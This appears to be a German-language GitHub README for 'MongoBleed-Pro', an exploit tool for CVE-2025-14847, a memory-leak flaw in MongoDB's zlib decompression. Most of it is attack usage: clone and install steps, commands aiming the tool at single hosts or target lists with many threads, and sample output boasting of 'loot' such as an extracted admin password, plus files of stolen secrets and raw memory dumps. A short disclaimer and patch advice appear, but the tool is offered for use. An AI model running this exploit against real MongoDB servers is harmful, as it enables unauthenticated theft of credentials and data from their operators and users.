
eine kritische Sicherheitslücke zur Offenlegung von Speicherinhalten in der zlib-Komprimierungsverarbeitung von MongoDB. Dieses Tool ermöglicht es Sicherheitsforschern, sensible Daten aus verwundbaren MongoDB-Instanzen zu extrahieren.
Erweitertes Exploit-Tool für MongoDB-Speicherlecks
Lerne weiter | Hacke weiter mit CyberTechAjju
MongoBleed-Pro ist ein fortschrittliches Exploit-Tool für CVE-2025-14847, eine kritische Schwachstelle zur Offenlegung von Speicherinhalten in der zlib-Komprimierung von MongoDB. Mit diesem Tool können Sicherheitsforscher vertrauliche Daten aus verwundbaren MongoDB-Instanzen extrahieren.
Dieses Tool ist ausschließlich für autorisierte Sicherheitstests und zu Bildungszwecken bestimmt. Unbefugter Zugriff auf Computersysteme ist illegal. Holen Sie vor Tests immer die entsprechende Genehmigung ein.
# Klone das Repository
git clone https://github.com/cybertechajju/CVE-2025-14847_Expolit.git
cd CVE-2025-14847_Expolit
# Installiere die Abhängigkeiten
pip install -r requirements.txt
python3 mongobleed_pro.py
python3 mongobleed_pro.py --target 192.168.1.100
python3 mongobleed_pro.py --target 192.168.1.100:27018
python3 mongobleed_pro.py --file targets.txt
python3 mongobleed_pro.py --target 192.168.1.100 --threads 100 --min-offset 100 --max-offset 20000
╔══════════════════════════════════════════════════════════════╗
║ 💀 INITIATING MEMORY EXTRACTION SEQUENCE 💀 ║
╚══════════════════════════════════════════════════════════════╝
⚡ Target Acquired: 192.168.1.100:27017
✓ Port OPEN
☠️ VULNERABLE! Initiating attack...
◉ 0x0E31 │ nr_inactive_anon 134420\nnr_active_anon 110832...
☠️ LOOT ACQUIRED: 🔐 Password
→ admin_pass=SuperSecret123
╔══════════════════ EXTRACTION COMPLETE ══════════════════╗
║ 💾 Bytes Extracted: 125,847
║ 📦 Unique Fragments: 342
║ 🔑 Secrets Found: 5
╚══════════════════════════════════════════════════════════╝
| Datei | Beschreibung |
|---|---|
loot_<host>.txt | Extrahierte Geheimnisse in lesbarem Format |
dump_<host>.bin | Roher Speicherauszug zur manuellen Analyse |
Wenn Sie MongoDB-Administrator sind, aktualisieren Sie auf gepatchte Versionen:
CyberTechAjju
Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe LICENSE für Details.
Wenn dir dieses Tool nützlich war, gib ihm bitte einen ⭐ auf GitHub!
「 Lerne weiter | Hacke weiter 」
Mit ❤️ erstellt von CyberTechAjju
| Eigenschaft | Details |
|---|
| CVE-ID | CVE-2025-14847 |
| Schwachstellentyp | Speicheroffenlegung |
| Betroffene Versionen | MongoDB < 8.0.10, < 7.3.6, < 7.0.19, < 6.0.23 |
| Grundursache | Puffer-Überlesen bei der zlib-Dekomprimierung |
| Auswirkung | Nicht authentifizierter Remote-Speicherleck |
| Argument | Beschreibung | Standard |
|---|
--target | Ziel-IP/-URL | Interaktive Eingabeaufforderung |
--file | Datei mit Zielliste | Keine |
--threads | Anzahl der Threads | 50 |
--min-offset | Mindest-Speicheroffset | 20 |
--max-offset | Maximaler Speicheroffset | 8192 |